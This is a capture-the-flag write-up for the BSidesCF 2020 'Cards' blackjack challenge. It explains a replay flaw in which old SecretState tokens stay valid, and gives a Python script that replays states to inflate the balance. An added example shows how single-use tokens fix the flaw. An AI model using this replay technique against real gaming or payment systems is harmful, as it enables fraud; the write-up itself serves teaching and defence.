[BSidesCF 2020]Cards

The response contains a large number of characters; the part enclosed in {} is JSON data, in the form "":"".


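Every request carries a SecretState parameter, which stores the game state and is kept in sync between the client and the server. This parameter cannot be tampered with. On every request the server generates a new SecretState, but the old SecretState is not invalidated, and that is where the problem lies.
If the game is won, update the SecretState; if it is lost, do not update the SecretState. This gives an effect where the score only ever goes up and never down.
There is one problem, though: after betting, revealing the cards requires the new SecretState, and the bet has already been deducted from the score at betting time, so the losing state still persists.
This is where a blackjack rule comes in: if the first two cards dealt already total 21 (blackjack), the player wins immediately (paid 1.5x). In that state the step of revealing the cards can be skipped.
First, obtain a secret from this URL, because it is needed later when playing a hand.
(The problem caused by the old SecretState still being valid, combined with the special blackjack rule: under specific circumstances the deal itself is an immediate win.)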

So it is enough to submit the SecretState of an A+10 hand on every deal.

Python script:

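```python
#secret='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'
# JSON data --------
# {"SecretState":"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","PlayerHand":[],"DealerHand":[],"Balance":1000,"GameState":"Idle","SessionState":"Playing","Bet":0}
# -----------------
import requests

start = "http://a459185f-ff4c-4d00-8013-34498ee7de73.node5.buuoj.cn:81/api"
deal = start + "/deal"


# Start a game and take the initial SecretState
state = requests.post(start).json()["SecretState"]

while True:
    # Place a bet using the last state we chose to keep
    try:
        resp = requests.post(deal, json={"Bet": 500, "SecretState": state}).json()
    except (requests.RequestException, ValueError):
        # Network error or non-JSON reply: retry with the same state
        continue

    # Keep the new state only when the deal is an immediate blackjack win;
    # otherwise the old, still-valid state is reused on the next deal
    if resp['GameState'] == 'Blackjack':
        state = resp['SecretState']

    print(resp['Balance'])
    if resp['Balance'] > 100000:
        print(resp)
        break
```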

(The point of this challenge is submitting JSON data, which I had never seen before~)
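
On the server side, the fix for the flaw described above is to make every SecretState single-use, so that a token issued before a losing hand is rejected. The following is an added example, not the challenge's server code and not part of the original write-up; the HMAC-signed token layout, the session id `s1` and the function names are assumptions made for illustration.

```python
import hashlib, hmac, json, secrets

KEY = secrets.token_bytes(32)   # server-side signing key (generated for the demo)
latest_seq = {}                 # session id -> sequence number of the only live token

def issue(sid, balance):
    """Sign a new state and make it the only live token for this session."""
    latest_seq[sid] = latest_seq.get(sid, 0) + 1
    body = json.dumps({"sid": sid, "seq": latest_seq[sid], "Balance": balance})
    tag = hmac.new(KEY, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + tag

def verify_integrity_only(token):
    """Behaviour described above: any untampered token is accepted, however old."""
    body, _, tag = token.rpartition(".")
    good = hmac.new(KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, good):
        raise ValueError("tampered SecretState")
    return json.loads(body)

def verify_single_use(token):
    """Hardened check: the token must also be the latest one issued for its session."""
    state = verify_integrity_only(token)
    if latest_seq.get(state["sid"]) != state["seq"]:
        raise ValueError("stale SecretState")
    return state

def demo():
    """Constructed sequence: one losing hand, then the pre-loss token is submitted again."""
    before = issue("s1", 1000)    # token held before the bet
    after = issue("s1", 500)      # token the server returns after a losing bet of 500
    replayed = verify_integrity_only(before)["Balance"]   # the loss is undone
    try:
        verify_single_use(before)
        hardened = "accepted"
    except ValueError as exc:
        hardened = str(exc)
    current = verify_single_use(after)["Balance"]         # the latest token still works
    return replayed, hardened, current

if __name__ == "__main__":
    print(demo())
```

Integrity protection alone only stops edits to the token; the per-session sequence check is what makes the balance in an older token unusable.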

Reference: https://blog.csdn.net/solitudi/article/details/109186061